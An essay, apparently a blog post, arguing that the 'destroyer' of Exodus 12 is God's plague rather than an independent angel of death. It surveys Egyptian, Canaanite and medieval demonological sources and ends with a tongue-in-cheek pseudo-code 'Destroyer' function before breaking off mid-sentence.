The Angel of Death as an Outsourced Service

Angel of Death in Egypt

The Haggadah, which is recited at the Seder on the first night of Passover, retells the biblical story of the infliction of the ten plagues on Egypt and the exodus of the Israelite slaves. One four-verse passage referencing chapter 12 in the book of Exodus stands out in the narrative because of the redundant emphasis on who was responsible for these acts:

  1. “I will pass through the land of Egypt”, I and not an angel;
  2. “And I will smite every first-born in the land of Egypt”, I and not a seraph;
  3. “And I will carry out judgment against all the gods of Egypt”, I and not a messenger;
  4. “I G-d”, and none other!

;וְעָבַרְתִּי בְאֶרֶץ מִצְרַיִם בַּלַּיְלָה הַזֶּה – אֲנִי וְלֹא מַלְאָךְ
;וְהִכֵּיתִי כָל בְּכוֹר בְּאֶרֶץ־מִצְרַים. אֲנִי וְלֹא שָׂרָף
;בְכָל־אֱלֹהֵי מִצְרַיִם אֶעֱשֶׂה שְׁפָטִים. אֲנִי וְלֹא הַשָּׁלִיח
.ואֲנִי ה’. אֲנִי הוּא וְלֹא אַחֵר

The 1320 Golden Haggadah P36-37
Image 1: The passage in the Golden Haggadah circa 1320 CE

The context of the verses makes it clear that G-d alone inflicted the punitive measures and that they were executed directly by Him and not through other intermediaries like an angel, seraph, or messenger. Further support for this can be found in verse 12:12:

“For I will go through the land of Egypt on that night and will smite all the first-born in the land of Egypt, both man and beast; and against all the gods of Egypt I will execute judgment: I am G-d.”

וְעָבַרְתִּי בְאֶרֶץ-מִצְרַיִם, בַּלַּיְלָה הַזֶּה, וְהִכֵּיתִי כָל-בְּכוֹר בְּאֶרֶץ מִצְרַיִם, מֵאָדָם וְעַד-בְּהֵמָה; וּבְכָל-אֱלֹהֵי מִצְרַיִם אֶעֱשֶׂה שְׁפָטִים, אֲנִי יְהוָה

But despite this clear and repetitive language regarding G-d’s direct responsibility, some Jewish and Christian scholars argue that the term “destroyer” used in verse 12:23 does not refer to G-d and should instead be read as the “angel of death”. They also postulate that G-d doesn’t act directly or get involved in the ‘hands-on’ day-to-day minutiae. Thus, he must have been using an agent of some sort to perform this work.

This textual dichotomy has been the source of endless arguments between theologians, translators and scholars. For example, the Pseudo-Jonathan Targum (translation) of Exodus 12 uses both the terms מַלְאָכָא מְחַבְּלָא (Aramaic for “destroying angel”) and מַלְאָךְ מוֹתָא, (Aramaic for the “angel of death”). Obviously, this interpretation suggests that besides G-d there is another entity—angelic or otherwise—with a certain degree of autonomy at work here.

From the contextual point of view, the arguments in favor of an angelic agent raise a number of questions about the role of this “destroyer” and the scope of his responsibility and autonomy. For example, can this destroyer exercise free judgment? Is he constrained by any boundaries?

The Hebrew bible emphasizes the idea that the entire universe falls under G-d’s jurisdiction and that all of nature falls under his control. He is the creator of light and darkness, good and evil. As Genesis 1:31 and Isaiah 45:7 state, He is the creator of all things:

“And G-d saw every thing that He had made, and, behold, it was very good. And there was evening and there was morning, the sixth day.”

וַיַּרְא אֱלֹהִים אֶת-כָּל-אֲשֶׁר עָשָׂה, וְהִנֵּה-טוֹב מְאֹד; וַיְהִי-עֶרֶב וַיְהִי-בֹקֶר, יוֹם הַשִּׁשִּׁי

I form the light, and create darkness; I make peace, and create evil; I am G-d, that doeth all these things.

יוֹצֵר אוֹר וּבוֹרֵא חֹשֶׁךְ, עֹשֶׂה שָׁלוֹם וּבוֹרֵא רָע; אֲנִי יְהוָה, עֹשֶׂה כָל-אֵלֶּה

The scripture also makes it clear that G-d is not dependent on his creation and the creation cannot exist independently of Him. Even Satan’s depiction in Job 1:7 illustrates that he is not a rival of G-d, nor does he possess the ability to oppose him in any way; he is just one of many tools that G-d uses to maintain the world in working moral order. Job 1:21 further reinforces the idea that the life and death cycle emanates entirely from G-d:

“And he said; naked came I out of my mother’s womb, and naked shall I return thither; G-d gave, and G-d hath taken away; blessed be the name of G-d.”

וַיֹּאמֶר עָרֹם יָצָתִי מִבֶּטֶן אִמִּי, וְעָרֹם אָשׁוּב שָׁמָּה יְהוָה נָתַן, וַיהוָה לָקָח; יְהִי שֵׁם יְהוָה, מְבֹרָךְ

So if the scripture consistently states that G-d has complete and undisputed sovereignty, what then is the basis for the existence of an independent angelic agent who manages death, destruction, and the afterlife?

Broadly speaking, the basis for this argument can be classified into these three categories of references:

  1. Specific scriptural terminology such as: Abaddon, destroyer, messengers of death, angel that destroys, executioner, slayer, angel of G-d, Ashmedai, Satan, the harvester of souls, the angel that smites, serpent, adversary, captain of the host of G-d, leviathan the slant serpent, leviathan the tortuous serpent, and dragon
  2. Allegorical Sources such as: Personification of death in the scripture, messengers of death, Day-Star, cherub that walks on stones of fire, and anointed cherub
  3. Legend Sources such as: Testament of Solomon, The Zohar, The Talmud, the book of Tobit, and Thanksgiving Hymns

Specifically, these implied angelic associations can be found in some of the following passages:

Genesis 3:2-5
Now the serpent was more subtle than any beast of the field which G-d had made. And he said unto the woman: ‘Yea, hath G-d said: Ye shall not eat of any tree of the garden?’

וְהַנָּחָשׁ, הָיָה עָרוּם, מִכֹּל חַיַּת הַשָּׂדֶה, אֲשֶׁר עָשָׂה יְהוָה אֱלֹהִים; וַיֹּאמֶר, אֶל-הָאִשָּׁה, אַף כִּי-אָמַר אֱלֹהִים, לֹא תֹאכְלוּ מִכֹּל עֵץ הַגָּן

Exodus 12:23
“For G-d will pass through to smite the Egyptians; and when He seeth the blood upon the lintel, and on the two side-posts, G-d will pass over the door and will not suffer the destroyer to come in unto your houses to smite you.” 

וְעָבַר יְהוָה, לִנְגֹּף אֶת-מִצְרַיִם, וְרָאָה אֶת-הַדָּם עַל-הַמַּשְׁקוֹף, וְעַל שְׁתֵּי הַמְּזוּזֹת; וּפָסַח יְהוָה, עַל-הַפֶּתַח, וְלֹא יִתֵּן הַמַּשְׁחִית, לָבֹא אֶל-בָּתֵּיכֶם לִנְגֹּף

Joshua 3:13-14
And he said: ‘Nay, but I am captain of the host of G-d; I am now come.’ And Joshua fell on his face to the earth, and bowed down, and said unto him: ‘What saith my lord unto his servant?’

וַיֹּאמֶר לֹא, כִּי אֲנִי שַׂר-צְבָא-יְהוָה–עַתָּה בָאתִי; וַיִּפֹּל יְהוֹשֻׁעַ אֶל-פָּנָיו אַרְצָה, וַיִּשְׁתָּחוּ, וַיֹּאמֶר לוֹ, מָה אֲדֹנִי מְדַבֵּר אֶל-עַבְדּוֹ

Zechariah 3:1-2
And he showed me Joshua the high priest standing before the angel of G-d, and Satan standing at his right hand to accuse him.

וַיַּרְאֵנִי, אֶת-יְהוֹשֻׁעַ הַכֹּהֵן הַגָּדוֹל, עֹמֵד, לִפְנֵי מַלְאַךְ יְהוָה; וְהַשָּׂטָן עֹמֵד עַל-יְמִינוֹ, לְשִׂטְנוֹ

Ezekiel 28:13-19
thou wast in Eden the garden of G-d; every precious stone was thy covering, the carnelian, the topaz, and the emerald, the beryl, the onyx, and the jasper, the sapphire, the carbuncle, and the smaragd, and gold; the workmanship of thy settings and of thy sockets was in thee, in the day that thou wast created they were prepared.

בְּעֵדֶן גַּן-אֱלֹהִים הָיִיתָ, כָּל-אֶבֶן יְקָרָה מְסֻכָתֶךָ אֹדֶם פִּטְדָה וְיָהֲלֹם תַּרְשִׁישׁ שֹׁהַם וְיָשְׁפֵה, סַפִּיר נֹפֶךְ, וּבָרְקַת וְזָהָב; מְלֶאכֶת תֻּפֶּיךָ וּנְקָבֶיךָ בָּךְ, בְּיוֹם הִבָּרַאֲךָ כּוֹנָנוּ

Job 1:6-12
Now it fell upon a day, that the sons of G-d came to present themselves before G-d, and Satan came also among them.

וַיְהִי הַיּוֹם–וַיָּבֹאוּ בְּנֵי הָאֱלֹהִים, לְהִתְיַצֵּב עַל-יְהוָה; וַיָּבוֹא גַם-הַשָּׂטָן, בְּתוֹכָם

Job 16:14
The wrath of a king is as messengers of death; but a wise man will pacify it.

חֲמַת-מֶלֶךְ מַלְאֲכֵי-מָוֶת; וְאִישׁ חָכָם יְכַפְּרֶנָּה

Job 33:22
Yea, his soul draweth near unto the pit, and his life to the destroyers.

וַתִּקְרַב לַשַּׁחַת נַפְשׁוֹ; וְחַיָּתוֹ, לַמְמִתִים

Isaiah 14:12
How art thou fallen from heaven, O day-star, son of the morning! How art thou cut down to the ground, that didst cast lots over the nations!

אֵיךְ נָפַלְתָּ מִשָּׁמַיִם, הֵילֵל בֶּן-שָׁחַר; נִגְדַּעְתָּ לָאָרֶץ, חוֹלֵשׁ עַל-גּוֹיִם

Isaiah 27:1
In that day the LORD with His sore and great and strong sword will punish leviathan the slant serpent, and leviathan the tortuous serpent; and He will slay the dragon that is in the sea.

בַּיּוֹם הַהוּא יִפְקֹד יְהוָה בְּחַרְבּוֹ הַקָּשָׁה וְהַגְּדוֹלָה וְהַחֲזָקָה, עַל לִוְיָתָן נָחָשׁ בָּרִחַ, וְעַל לִוְיָתָן, נָחָשׁ עֲקַלָּתוֹן; וְהָרַג אֶת-הַתַּנִּין, אֲשֶׁר בַּיָּם

Isaiah 37:36
And the angel of G-d went forth, and smote in the camp of the Assyrians a hundred and fourscore and five thousand; and when men arose early in the morning, behold, they were all dead corpses.

.וַיֵּצֵא מַלְאַךְ יְהוָה, וַיַּכֶּה בְּמַחֲנֵה אַשּׁוּר, מֵאָה וּשְׁמֹנִים וַחֲמִשָּׁה, אָלֶף; וַיַּשְׁכִּימוּ בַבֹּקֶר, וְהִנֵּה כֻלָּם פְּגָרִים מֵתִים

Proverbs 16:14
The wrath of a king is as messengers of death; but a wise man will pacify it.

חֲמַת-מֶלֶךְ מַלְאֲכֵי-מָוֶת; וְאִישׁ חָכָם יְכַפְּרֶנָּה

Psalm 109:6
Set Thou a wicked man over him; and let an adversary stand at his right hand.

הַפְקֵד עָלָיו רָשָׁע; וְשָׂטָן, יַעֲמֹד עַל-יְמִינוֹ

2 Samuel 24:16
”And when the angel stretched out his hand toward Jerusalem to destroy it, G-d repented Him of the evil, and said to the angel that destroyed the people: ‘It is enough; now stay thy hand.’ And the angel of G-d was by the threshing-floor of Araunah the Jebusite.”

וַיִּשְׁלַח יָדוֹ הַמַּלְאָךְ יְרוּשָׁלִַם, לְשַׁחֲתָהּ, וַיִּנָּחֶם יְהוָה אֶל-הָרָעָה, וַיֹּאמֶר לַמַּלְאָךְ הַמַּשְׁחִית בָּעָם רַב עַתָּה הֶרֶף יָדֶךָ; וּמַלְאַךְ יְהוָה הָיָה, עִם-גֹּרֶן האורנה (הָאֲרַוְנָה) הַיְבֻסִי

Chronicles 21:14-16
So G-d sent a pestilence upon Israel; and there fell of Israel seventy thousand men.

וַיִּתֵּן יְהוָה דֶּבֶר, בְּיִשְׂרָאֵל; וַיִּפֹּל, מִיִּשְׂרָאֵל, שִׁבְעִים אֶלֶף, אִישׁ

And G-d sent an angel unto Jerusalem to destroy it; and as he was about to destroy, G-d beheld, and He repented Him of the evil, and said to the destroying angel: ‘It is enough; now stay thy hand.’ And the angel of G-d was standing by the threshing-floor of Ornan the Jebusite.

וַיִּשְׁלַח הָאֱלֹהִים מַלְאָךְ לִירוּשָׁלִַם, לְהַשְׁחִיתָהּ, וּכְהַשְׁחִית רָאָה יְהוָה וַיִּנָּחֶם עַל-הָרָעָה, וַיֹּאמֶר לַמַּלְאָךְ הַמַּשְׁחִית רַב עַתָּה הֶרֶף יָדֶךָ; וּמַלְאַךְ יְהוָה עֹמֵד, עִם-גֹּרֶן אָרְנָן הַיְבוּסִי

And David lifted up his eyes, and saw the angel of G-d standing between the earth and the heaven, having a drawn sword in his hand stretched out over Jerusalem. Then David and the elders, clothed in sackcloth, fell upon their faces.

וַיִּשָּׂא דָוִיד אֶת-עֵינָיו, וַיַּרְא אֶת-מַלְאַךְ יְהוָה עֹמֵד בֵּין הָאָרֶץ וּבֵין הַשָּׁמַיִם, וְחַרְבּוֹ שְׁלוּפָה בְּיָדוֹ, נְטוּיָה עַל-יְרוּשָׁלִָם; וַיִּפֹּל דָּוִיד וְהַזְּקֵנִים מְכֻסִּים בַּשַּׂקִּים, עַל-פְּנֵיהֶם

II Kings 19:35
And it came to pass that night, that the angel of G-d went forth, and smote in the camp of the Assyrians a hundred fourscore and five thousand; and when men arose early in the morning, behold, they were all dead corpses.

וַיְהִי, בַּלַּיְלָה הַהוּא, וַיֵּצֵא מַלְאַךְ יְהוָה וַיַּךְ בְּמַחֲנֵה אַשּׁוּר, מֵאָה שְׁמוֹנִים וַחֲמִשָּׁה אָלֶף; וַיַּשְׁכִּימוּ בַבֹּקֶר, וְהִנֵּה כֻלָּם פְּגָרִים מֵתִים

Hosea 13:14
Shall I ransom them from the power of the nether-world? Shall I redeem them from death? Ho, thy plagues, O death! Ho, thy destruction, O nether-world! Repentance be hid from Mine eyes!

מִיַּד שְׁאוֹל אֶפְדֵּם, מִמָּוֶת אֶגְאָלֵם; אֱהִי דְבָרֶיךָ מָוֶת, אֱהִי קָטָבְךָ שְׁאוֹל–נֹחַם, יִסָּתֵר מֵעֵינָי

The argument advocating for the concept of an independent destroyer goes back to the dawn of Egyptian and Canaanite religions. Egyptian texts that describe Osiris as the god of the dead and the lord of the underworld date as early as 2500 BCE. According to passages in the Book of the Dead, after death, the deceased would face forty-two divine judges who evaluated whether they had lived in conformance with the guidelines of the goddess Ma’at, who represented truth and righteous living. If they passed the test, they were welcomed into the heavenly kingdom of Osiris. If they failed, they did not share in eternal life and were taken by Ammit, the “devourer”, subjected to terrifying punishments, and then thrown to the soul-eating demons in hell. Sort of Dante’s Inferno, Egyptian style.

Once they were in hell, the goddess Sekhmet inflicted further punishments on them in the place of “destruction”. The dead were thrown into lakes of fire kindled by flame-spitting snakes, where demons fed on the victims’ entrails and drank their blood. The demons then butchered and hacked their victims to pieces and burned them with inextinguishable fire, in deep pits or in cauldrons, where they were scorched, cooked, and reduced to ashes.

Egyptian Hell
Image 2: Egyptian view of hell

Although their accounts are not as detailed as the Egyptian Book of the Dead, the Canaanites developed similar concepts about their god of death and the underworld.

The Canaanite deity Mavet מָוֶת (who shares some traits with Osiris) played a central role in the Baal Cycle, written circa 1500 BCE. The hymn describes the god of death and the underworld as a predator with an insatiable appetite for consuming the living:

…Mavet (Death) would open His mouth wide.
“A lip to earth,
A lip to heaven,
And a tongue to the stars,
So that Baal may enter His inwards,
Yea, descend into His mouth,
As scorched is the olive,
The produce of the Earth,
And the fruit of the Trees.”

In addition to a detailed description of Mavet’s character and exploits, several other passages in the text detail the rivalry between Baal (the Canaanite equivalent of Zeus) and his brother Mavet (the Canaanite equivalent of Hades). In one example, the goddess Anath informs El, the head of the gods, about a battle she witnessed between the two deities:

Then Anath went to El, at the source of the rivers, in the middle of the bed of the two oceans.
She bows at the feet of El, she bows and prosternates and pays him respects.
She speaks and says:
“the very mighty Baal is dead.
The prince, lord of the earth, has died” (…)
“They fight like heroes. Mavett wins, Baal wins.
They bit each other like snakes.
Mavett wins, Baal wins.
They jump like horses.
Mavett is scared. Baal sits on his throne”.

In the final part of the Baal cycle, Mavet informs Baal that he, “like a lion in the desert, hungers constantly for human flesh and blood”. Mavet threatens to cause the heavens to wilt and collapse, and to break Baal into pieces and eat him. Shapash, the sun-goddess, also warns Baal about Mavet’s superior power and advises that he submit to him:

Do not draw near the god Mavet,
Lest He make You like a lamb in His mouth,
Like a kid in His jaws Ye be crushed!
The Torch of the gods, Shapash, burns;
The heavens halt on account of El’s darling, Mavet.
By the thousand acres,
Yea the myriad hectares
At the feet of Mavet bow and fall.
Prostrate Yourselves and honor Him!

The goddess Anath Text
Image 3: Text from the goddess Anath epic referencing Baal’s rivals

The Hebrew Bible rejected these polytheistic concepts of an independent god of death and the rivalry between deities. According to Isaiah 45:7, G-d is the only source of both good and evil and is the master of life and death.

Cassuto, in his commentary on the Pentateuch, argued that the Bible was written in the language of the common man, and thus the personification of death and the allusions to his other emissaries, such as leviathan the slant serpent, leviathan the tortuous serpent, and the dragon as described in Genesis 1:21 and Isaiah 23:1, were remnants of the ideological war that the Hebrew Bible waged against the pervasive culture that was infused with these concepts. In opposition to the dominant beliefs of the time, the scripture emphasized the notion that no other entity but G-d possessed the power to create man and return him to dust (Job 10:9).

A careful reading of the roles of the “destroyer”, “the harvester of souls”, and the “angel of the Lord” who “smites” and “destroys” human beings in the scripture shows that they are always temporary messengers with a limited scope of operation and limited windows of opportunity for action. In the few instances where death is personified, as in Psalms 49:15; 91:3; Job 18:14; and Proverbs 16:14; 17:11, it is clear that he does not possess any permanent power, nor does he have the ability to terminate life of his own volition.

From a historical perspective, the western concept of an independent angel of death only emerged in the post-biblical period and can be attributed to the fusion of Egyptian, Canaanite, and Greek religions in the Hellenistic world.

This amalgam of deities the likes of Hades, Osiris, and Mavet formed the distinct figure of the angel of death who became associated with the terrifying demons and evil spirits commonly found in the ancient near east literature. By this time, this hybrid deity retained only a tangential association with the biblical concepts of the destroyer as a vehicle for delivering morally driven divine retribution. 

This new manifestation of evil, death, cruelty, and wretchedness also incorporated the concept of the morally deficient, cunning, and deceitful snake from the garden of Eden (Genesis 3:1-14), and after several additions and enhancements such as evil spirits, demons, and Liliths, it appeared in the literature and theology of the 2nd century BCE-1st century CE as בְּלִיַעַל‎ Belial. One example, dated to the Second Temple period and found in a Dead Sea Scroll titled the “Songs of the Sage”, contains the following apotropaic prayer:

“And, I the Sage, declare the grandeur of his radiance in order to frighten and terri[fy] all the spirits of the ravaging angels and the bastard spirits, demons, Liliths, owls”

In another Dead Sea scroll, a fragment entitled “Curses of Belial” contains a reference to Belial בְּלִיַעַל (wicked or worthless), “sons of Belial”, the “angel of the Pit” and a “spirit of destruction” and carries the following curses against him and his lot:

“The Community Council shall say together in unison, ‘Amen. Amen.’ Then [they] shall curse Belial and all his guilty lot, and they shall answer and say, ‘Cursed be [Be]lial in his devilish and damned be he in his guilty rule.’”

From the 2nd century CE through the early middle ages, Belial became affiliated with the devil in gospel texts and assumed a central and permanent role of the ultimate evil that seeks to seduce, sabotage, harm, and fight mankind. He is described as a rebellious fallen angel who rose against G-d and challenged his sovereignty.

Lacking direct biblical sources to support these assertions, some prominent theologians such as Cyprian, Clement of Alexandria, Augustine, Dionysius the Pseudo-Areopagite, John of Damascus, and Origen used unrelated passages such as Isaiah 14:12-15 to buttress their claims:

“And thou saidst in thy heart: ‘I will ascend into heaven, above the stars of G-d will I exalt my throne, and I will sit upon the mount of meeting, in the uttermost parts of the north;
I will ascend above the heights of the clouds; I will be like the Most High.’”

The Satanic Verses V1
Image 4: L-R Cyprian, Clement of Alexandria, Augustine, Dionysius, John of Damascus, Origen 

The absence of supporting scriptural provenance didn’t stop the widespread dissemination of these daemonic ideas. Now instead of using biblical exegesis, writers resorted to speculative fiction to describe in detail the devil’s nature, domain, powers, and attributes. For example, Cyprian in his Treatise 10.4 claimed that the reason for the fall of Satan was:

“When he saw human beings made in the image of God, he broke forth into jealousy and malevolent envy” and thus rebelled against God.

Where the biblical world experienced a rare and indirect interaction with a “destroyer”, the religious universe of the late Roman period swarmed with pitched battles between angels and demons, with humanity caught in between. Even the most mundane matters, including eating, marriage, and bearing children, became a battleground between good and evil. Origen in his Commentary on Matthew and Clement of Alexandria in his Stromata discuss these prevailing contemporary views, including one that the institution of marriage “is fornication” and that it was “introduced by the devil”.

By now, the previous narrative of the “destroyer” as a mere messenger or the delivery mechanism for divine retribution had regressed to the ancient idolatrous relationship between factions of warring deities reflected in the Enuma Elish. The new pantheon of the devil and his cohorts grew steadily, and by the 6th century CE authors were dedicating entire treatises to the cataloging of the demonic and angelic realms. Early medieval writers such as Pseudo-Dionysius the Areopagite also produced encyclopedic works such as The Celestial Hierarchy that classified angels by function and utility and discussed in great detail subjects such as:

“Which is the first Order of the Heavenly Beings? which the middle? and which the last? How many, and of what sort, are the Orders of the super-celestial Beings, and how the Hierarchies are classified amongst themselves”

Pseudo-Dionysius the Areopagite, The Celestial Hierarchy
Image 5: The Celestial Hierarchy of Pseudo-Dionysius the Areopagite

By the Second Council of Nicaea in 787 CE, angels and saints (who are in effect demi-angels) became official objects of veneration and adoration and patrons of every mundane daily function such as food preparation, travel, and athletic activity.

St. Sebastian Sterling Silver Medals
Image 6: The St. Sebastian athletic amulets

By the middle ages, Archangel Michael acquired an affiliation with certain functions of the angel of death who, among other responsibilities, was tasked with evaluating and carrying the souls of all the deceased to heaven and fighting Satan. Just like in the case of the Egyptian Anubis, Byzantine and Catholic liturgy and art assigned Michael the role of weighing the souls of the dead with his scales. Another popular depiction shows him armed with a spear or sword and locked in mortal combat with Satan, in which, for some unknown reason, he consistently fails to win a decisive victory.

Archangel Michael
Image 7: Depiction of Archangel Michael in medieval and renaissance art

Anubis Weighing of the Heart
Image 8: Anubis weighing the souls of the dead

From the late middle ages through the late renaissance, we find an increasing number of books on demonic classification. These works progressively become more elaborate. They detail the nature of each demon, their MO, the category of sins which they impart to their human victims, the month in which their power is strongest, and the saints that are their adversaries. Some of the more notable classification works from this period are:

The 1410 Lantern of Light by John Wycliffe. A daemon classification system that was based on the Seven Deadly sins and the following association of sin and demon:

  1. Lucifer – Pride
  2. Beelzebub (Belzebub) – Gluttony (Glotouns)
  3. Satan (Sathanas) – Wrath (Wraþþe)
  4. Leviathan (Leviathan) – Envy (Envous)
  5. Mammon – Greed (Auarouse)
  6. Belphegor –  Sloth (Slow)
  7. Asmodeus – Lust (Leccherouse)

The 1459 Fortalitium Fidei by Alphonso de Spina. In the chapter on demons, Alphonso took daemon accounting to a new level of precision and stated that the total number of angels who sided with Lucifer’s revolt against G-d was 133,306,668. He also classified demons based on the following criteria:

  1. Incubi and succubi
  2. Familiars
  3. Drudes
  4. Cambions born from the union of a demon with a human being (AKA witches and warlocks).
  5. Demons that induce old women to attend Witches’ Sabbaths

The c. 1486 Malleus Maleficarum (Hammer of Witches). This most ‘thorough’ treatise on witchcraft and demons was written by two German Dominican monks, Heinrich Kramer and Jacob Sprenger, and came with an official papal bull. The book sold more copies than any other book except the Bible until 1678. It was single-handedly responsible for the murder of hundreds of thousands (if not millions) of innocent women and young girls across Europe. According to the book, it has been proven that it is normal for many women to embrace sorcery and “to perform filthy carnal acts with demons.”

The 1533 De Occulta Philosophia by Cornelius Agrippa. A demon classification system based on the number 4 and the cardinal directions that included:

  1. Oriens – East
  2. Paymon – West
  3. Egyn – North
  4. Amaymon – South

The 1591 The Confessions of Warlocks and Witches by Peter Binsfeld. A demon classification system similar to the Lantern of Light’s seven deadly sins but with a slight variation in the classification as follows:

  1. Lucifer – Pride
  2. Mammon – Greed
  3. Asmodeus – Lust
  4. Leviathan – Envy
  5. Beelzebub – Gluttony
  6. Satan – Wrath
  7. Belphegor – Sloth

The 1597 Daemonologie by King James (the same James who later sponsored the translation of the Bible to English better known as the “King James Bible”). A demon classification treatise in three volumes dedicated to the study of demonology and the methods demons used to inflict and torment mankind. The classification included:

  1. Spectra – Used to describe spirits that trouble houses or solitary places
  2. Oppression – Used to describe spirits that follow upon certain people to outwardly trouble them at various times of the day
  3. Possession – Used to describe spirits that enter inwardly into a person to trouble them
  4. Fairies – Used to describe spirits that prophesy, consort, and transport

The books also covered important topics such as werewolves and vampires. They were aimed at educating the ignorant citizenry of England on the history, practices, and implications of practicing sorcery and all things demonic.

The Observer's Book of Monsters by Claude Savagely
Image 9: The Observer’s Book of Monsters by Claude Savagely

The 1608 Compendium Maleficarum by Francesco Maria Guazzo (a rework/rip-off of the 11th century Classification of Demons by Michael Psellus). The work classified demons into:

  1. Empyreal – Fiery
  2. Aerial – Airborne
  3. Subterranean – Underground
  4. Lucifugous – Heliophobic
  5. Aqueous – Water based
  6. Terrene – On the ground

The 1686 Semiphoras and Schemhamforas by Andreas Luppius which was based on a similar system of classification as “De Occulta Philosophia” but instead of 4 used the number 9 and had the following orders of demons:

  1. False spirits
  2. Spirits of lying
  3. Vessels of iniquity
  4. Avengers of wickedness
  5. Jugglers
  6. Airy powers
  7. Furies sowing mischief
  8. Sifters or triers
  9. Tempters or ensnarers

Demonic classification books
Image 10: A sampling of a few demonic classification books from the 14th-17th centuries

Some ancient and modern Jewish scholars, like Richard Friedman, also erroneously made the correlation between the “destroyer” and the angel of death. These errors were based on anecdotal evidence in the secondary literature and art. Friedman, for example, came to this conclusion based on a sword-bearing figure in one of the illustrations in the Golden Haggadah whom he identified as the angel of death (top right corner of Image 11). This led him to conclude that the authors of the 14th century Haggadah must have also subscribed to the textual and theological interpretation that the “destroyer” was in fact the angel of death.

Golden Haggadah Angel of Death
Image 11: Illustration from the Golden Haggadah (Note figure in top right corner)

Ironically, the same Golden Haggadah that is used as proof for the existence of the angel of death contains a handwritten note, which is a combination of some biographical details and poetry. Line 6 of the note reads:

״…בחוכמה בתבונה ובדעת, חי העולמים יושב המרומים ומשגיח התחתונים אחד ונעלם אלקי חיים ומלך עולם…״

“…In wisdom, understanding, and knowledge, the creator of the universe who sits on high and oversees the underworld (i.e. the dead), who is one and unseen, the king of the world…”

From the context it’s clear that the writer of the text (and likely the owner of the book) did not buy into the angel of death idea or his ability to challenge the sovereignty of G-d.

Intro Text to Golden Haggadah
Image 12: The handwritten note in cursive script in the Golden Haggadah and its in-line transliteration to block script

I think that the confusion about the meaning of the “destroyer” in the verses in Exodus can be attributed to the misreading of the text and failure to identify the wordplay and the variant usage of the root N-G-F נגפ. This root and its derivatives can be read as smite, obstacle, defeated, plague, blow, and strike. Depending on its usage and context, it can also be used as a noun such as in ‘bubonic plague’ and as a verb such as in ‘I’ve been plagued by ill health’. Keeping this in mind, we can try to reconcile the contextual problem by reading verses 12:12-29 as follows:

12–For I will go through the land of Egypt in that night, and will smite [וְהִכֵּיתִי] all the first-born in the land of Egypt, both man and beast; and against all the gods of Egypt I will execute judgments: I am G-d.

13–And the blood shall be to you for a token upon the houses where ye are; and when I see the blood, I will pass over you, and there shall no plague [נֶגֶף] be upon you to destroy [לְמַשְׁחִית] you, when I smite [בְּהַכֹּתִי] the land of Egypt.

22–Take a bunch of hyssop, and dip it in the blood that is in the basin, and strike the lintel and the two side-posts with the blood that is in the basin; and none of you shall go out of the door of his house until the morning.

23–For G-d will pass through to smite [לִנְגֹּף] the Egyptians; and when He seeth the blood upon the lintel, and on the two side-posts, G-d will pass over the door, and will not suffer the destroyer [הַמַּשְׁחִית] to come in unto your houses to smite [לִנְגֹּף] you.

27–that ye shall say: It is the sacrifice of G-d’s Passover, for that He passed over the houses of the children of Israel in Egypt, when He smote [בְּנָגְפּוֹ] the Egyptians, and delivered our houses.’ And the people bowed the head and worshipped.

29–And it came to pass at midnight, that G-d smote [הִכָּה] all the firstborn in the land of Egypt, from the first-born of Pharaoh that sat on his throne unto the first-born of the captive that was in the dungeon; and all the first-born of cattle.

Putting all of these elements together gives us: the destroyer [הַמַשְׁחִית] smites [לִנְגֹּף] using a plague [מגיפה] the first born in Egypt via “the destroyer’s plague” [ נֶגֶף לְמַשְׁחִית], with plague [נֶגֶף].

A similar wordplay in English would be along the lines of:

The striker (destroyer), struck (inflicted), the stricken (victims), with a strike (affliction).

So, G-d Himself “passes through” (עָבַר) the land of Egypt and smites all the firstborn in the land of Egypt. This is accomplished via “the destroyer” which happens to be the plague, that plagues the firstborn of Egypt with a plague. In this context, the destroyer is G-d’s mechanism for delivering the destruction. 

To paraphrase Sherlock Holmes: “This Exodus story stands flat-footed upon the ground and there it must remain. The world is big enough for us. No angel of death need apply.”

Considering this, I propose a practical alternative reading of the “destroyer” to be a software function that looks like the following:

Function Destroyer(Identity, DateTime, Agent, Cause, Delay, Reason, Place, Duration, Awareness, Terminate)
  ' Identity  = Identity of the deceased (VictimID)
  ' DateTime  = Date&Time of death (from the creation of the universe)
  ' Agent     = Delivery Mechanism (e.g. Carbon monoxide)
  ' Cause     = Actual cause of death (see CDC codes)
  ' Delay     = In hours:minutes:seconds
  ' Reason    = Triggering event
  ' Place     = Location of victim in universal XYZ coordinates
  ' Duration  = Timed (use 'Delay' as an offset) or Permanent
  ' Awareness = Premonition value 0-9 about the impending death
  ' Terminate = A real-time abort flag (True or False)
End Function

Module TenthPlague

  Sub KillFirstBorn()

    ' DeceptionInvolved = Use cases like Egyptians using fake blood
    ' or paint on their door, hiding in an Israelite home, etc.

    ' Test if everything is Kosher
    If BloodFoundOnDoor = True And DeceptionInvolved = False Then

      ' Nothing to see here, move along…
      Exit Sub

    ' Are they cheating?
    ElseIf DeceptionInvolved = True Then

      ' Is there a first born inside?
      If FirstBornPresent And Terminate = False Then
        ' Get'em!
        Destroyer(VictimID, 4.54×10^9, Anthrax, Pneumonia-Cardiac Arrest, 0, Disobedience10,
                  30°0’47.001656” N 31° 12’31.870834” E 12.920, Permanent, 0, False)
      End If

    ' There is no blood on the door or we are in the open
    ElseIf BloodFoundOnDoor = False Then

      ' Is there a first born present?
      If FirstBornPresent And Terminate = False Then
        ' Get'em!
        Destroyer(VictimID, 4.54×10^9, Anthrax, Pneumonia-Cardiac Arrest, 0, Disobedience10,
                  30°0’47.001656” N 31° 12’31.870834” E 12.920, Permanent, 0, False)
      End If

    End If

  End Sub

End Module

The destroyer is no more good or bad than any other type of delivery system is good or bad, and it has no more free will than a carrier delivering a package. Thus, the destroyer is a mere mechanism that G-d uses to execute judgment upon Egypt, Israel, and others. It is not a separate entity. The same dual reference to G-d’s ‘action’ and His ‘delivery mechanism’ can be seen in Samuel 15-16, where G-d sent a plague to punish Israel:
 
“So G-d sent a pestilence  upon Israel from the morning even to the time appointed; and there died of the people from Dan even to Beer-sheba seventy thousand men.”

וַיִּתֵּן יְהוָה דֶּבֶר בְּיִשְׂרָאֵל, מֵהַבֹּקֶר וְעַד-עֵת מוֹעֵד; וַיָּמָת מִן-הָעָם, מִדָּן וְעַד-בְּאֵר שֶׁבַע, שִׁבְעִים אֶלֶף, אִישׁ

and in Samuel 24:16, where the “destroyer” is described as:
 
